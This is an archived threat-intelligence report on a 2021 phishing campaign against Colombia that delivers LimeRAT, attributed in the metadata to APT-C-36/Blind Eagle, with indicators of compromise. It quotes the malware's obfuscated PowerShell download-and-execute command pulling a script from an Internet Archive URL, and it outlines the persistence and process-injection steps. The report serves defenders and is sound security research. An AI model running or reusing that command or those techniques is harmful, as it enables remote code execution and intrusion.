{ "id": "496d68a4-3864-4a1b-a17a-b3861353347c", "created_at": "2026-04-06T00:16:12.40644Z", "updated_at": "2026-04-10T13:12:32.259457Z", "deleted_at": null, "sha1_hash": "68886576280e56f78d2df6457ef73c3650064c7b", "title": "Literature lover targeting Colombia with LimeRAT", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 618593, "plain_text": "Literature lover targeting Colombia with LimeRAT\r\nPublished: 2021-05-17 · Archived: 2026-04-05 13:02:12 UTC\r\nIn the middle of the current brouhaha in Colombia, besides the intense hacktivism activity, some actors might be\r\ntrying to take their move. Several campaigns aimed to Colombia have been detected, but today we will talk about\r\none with a couple interesting details in their kill chain.\r\nThis actor is starting the infection via email with very generic topics such as subpoenas or bank payments, with a\r\ncrafted html view where the icon pretending to be an attachment is in fact an image with a link to download a\r\ncompressed file from One Drive.\r\nPhishing emails serving same malicious sample\r\nThe .rar file contains a Visual Basic Script with same name “citacion juzgado.vbs” which, poorly obfuscated, will\r\ncreate a Windows Script Host Shell Object to download and execute a new Powershell script by executing the\r\nfollowing command:\r\n“C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe” I`E`X((n`e`W`-\r\nObj`E`c`T((‘Net.Webclient’))).\r\n((‘Downloadstri’+’ng’)).InVokE(((‘https://ia601509.us.archive.org/20/items/3_20210512_20210512_1430/3.txt’))))\r\nThe interesting fact about this first stage is that this element is being downloaded from The Internet Archive,\r\nwhere you can take snapshots of websites, or upload “antique” files, so they keep being accessible after the\r\nwebsite disappears from the ordinary internet at their original hosting site. We are starting to witness how\r\nattackers are using legitimate domains such as discord or twitter, to download some malicious payload, or even\r\nlegitimate cloud services such as One Drive or DropBox to host different samples. However, using The Internet\r\nArchive could be considered witty, and not-so-much seen in the wild so far.\r\nhttps://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/\r\nPage 1 of 5\n\nOpendir in The Internet Archive\r\nBasically, this Powershell script will download a series of other different scripts which will be dropped in\r\n“C:\\Users\\Public\\” and “C:\\ProgramData\\Microsoft Arts\\Start\\”, and establish persistence using the Registry Key\r\n“HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders”.\r\nInfection Chain\r\nAmong these different scripts, most of them trying to disable typical AntiVirus solutions, there is one\r\nimplementing a technique a little more advanced than the rest of the techniques, known as Reflection Assembly,\r\nand consisting of the creation of binary payloads as byte arrays in Powershell and then loading them using a\r\npuppet process injection within the memory of process\r\n“C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe” as shown in the following screenshot, or in\r\n“C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe”, depending on the results of some previous\r\nchecks.\r\nReflected Assembly Process injection\r\nhttps://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/\r\nPage 2 of 5\n\nAfter dumping this binary content into respective files, we could identify two Dynamic Libraries written in .NET,\r\none of them used as a loader for the other, which happens to be the final malicious Remote Access Trojan (RAT).\r\nAccording to 360 Total Security researchers, some similar techniques were spotted loading a Delphi version of the\r\nnjRAT in July 2020, by what it seemed to be an Arabic speaker actor. Even though in both cases the binary files\r\nhave resulted in Dynamic Libraries and same loading technique, in this occasion both binaries were identified as\r\nwritten in .NET. Furthermore, the RAT used in this scenario was Lime-RAT, a modified version of njRAT.\r\nWhen taking a closer look at the final stage in order to identify the final Command and Control server, we found\r\nanother interesting element. This actor chose the domain “santiagonasar.]duckdns.org”, which is actually the name\r\nof the main character of Chronicle of a Death Foretold (Crónica de una muerte anunciada), a great novel written\r\nby Gabriel García Márquez, Colombian writer. But the passion for literature of our friends was not only reflected\r\nin the domain name, but also in the chosen port: 1984. Although the aforementioned book was published in 1983,\r\nour first impression was to think of this name as a reference to the novel written by George Orwell, named\r\n“1984”.\r\nDespite having seen the string “ALOSH” repetitively through the different stages, suggesting that this could be an\r\nindividual going by this nickname, it is worth mentioning the fact that the APT group referred as APT-C-36, or\r\nBlind Eagle, have been spotted many times using this same toolset including LimeRAT, targeting same geographic\r\narea through phishing emails written in perfect Spanish, and also using Duckdns as part of their infrastructure.\r\nAfter a quick research on previous DNS resolutions of the final C2, we could identify related documents\r\ncontacting the same IP, referring to Colombia and the use of the word “Cacha”, which could be a way of saying\r\n“friend” or “brother” in Colombia, among other meanings in Spanish. These relations, added to the Spanish\r\nliterary culture, would clearly indicate a focus in Colombia.\r\nPrevious domains resolving to same IP\r\nDifferent execution parents\r\nLastly, after another quick search on different binary executables contacting this same C2, we found different\r\nforms of packed malware samples using strings in Asian and Cyrillic encoding, with a noisier obfuscation. About\r\nthese samples, we noticed that the attacker could have been only rotating the contacted port (4433, 1986, 2000)\r\nwhich could be enough to mislead an automated sandbox identifying the host as dead. The cached analysis in\r\nhttps://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/\r\nPage 3 of 5\n\nshodan.io would also show that the server might only have one port open at a time, which would support the idea\r\nof the attacker rotating ports for every campaign while reusing same C2 infrastructure.\r\nC2 check in shodan.io\r\nIOCs\r\n0d7abdd154b96c36680719ef15d81c64a0a12276a5d1ec8d9ec0bffd45545d6\r\nff525bc3aade928db718dab395eeba0f886054c889dda2389a51628d58924ff5\r\n0a9a1e043d8138bb8fb257f07ac80c0fb8287eec1c131efff3a4302b13ec78c3\r\nhttps://onedrive.live.]com/download?\r\ncid=A4F059D1DE692167\u0026resid=A4F059D1DE692167%21107\u0026authkey=AOG1a9Z-hUIFbhI\r\nhttps://nyc008.hawkhost.]com/~invoixec/\r\nhttps://ia601509.us.archive.]org/20/items/3_20210512_20210512_1430/3.txt\r\nhttps://ia601509.us.archive.]org/28/items/1_20210512_20210512_1427/1.txt\r\nsantiagonasar.]duckdns.org\r\nsantiagonasar2.]duckdns.org\r\ncachanuevo.]duckdns.org\r\n2021cacha.]duckdns.org\r\nenviocacha.]duckdns.org\r\nsosht.]duckdns.org\r\n172.96.187.2\r\n181.141.0.30\r\nReferences\r\nhttps://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/\r\nPage 4 of 5\n\nhttps://twitter.com/1ZRR4H/status/1392789216141004802\r\nhttps://blog.360totalsecurity.com/en/new-infection-chain-of-njrat-variant/\r\nSource: https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/\r\nhttps://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/" ], "report_names": [ "literature-lover-targeting-colombia-with-limerat" ], "threat_actors": [ { "id": "98b22fd7-bf1b-41a6-b51c-0e33a0ffd813", "created_at": "2022-10-25T15:50:23.688973Z", "updated_at": "2026-04-10T02:00:05.390055Z", "deleted_at": null, "main_name": "APT-C-36", "aliases": [ "APT-C-36", "Blind Eagle" ], "source_name": "MITRE:APT-C-36", "tools": [ "Imminent Monitor" ], "source_id": "MITRE", "reports": null }, { "id": "be597b07-0cde-47bc-80c3-790a8df34af4", "created_at": "2022-10-25T16:07:23.407484Z", "updated_at": "2026-04-10T02:00:04.58656Z", "deleted_at": null, "main_name": "Blind Eagle", "aliases": [ "APT-C-36", "APT-Q-98", "AguilaCiega", "G0099" ], "source_name": "ETDA:Blind Eagle", "tools": [ "AsyncRAT", "BitRAT", "Bladabindi", "BlotchyQuasar", "Imminent Monitor", "Imminent Monitor RAT", "Jorik", "LimeRAT", "Remcos", "RemcosRAT", "Remvio", "Socmer", "Warzone", "Warzone RAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "bd43391b-b835-4cb3-839a-d830aa1a3410", "created_at": "2023-01-06T13:46:38.925525Z", "updated_at": "2026-04-10T02:00:03.147197Z", "deleted_at": null, "main_name": "APT-C-36", "aliases": [ "Blind Eagle" ], "source_name": "MISPGALAXY:APT-C-36", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434572, "ts_updated_at": 1775826752, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/68886576280e56f78d2df6457ef73c3650064c7b.pdf", "text": "https://archive.orkl.eu/68886576280e56f78d2df6457ef73c3650064c7b.txt", "img": "https://archive.orkl.eu/68886576280e56f78d2df6457ef73c3650064c7b.jpg" } }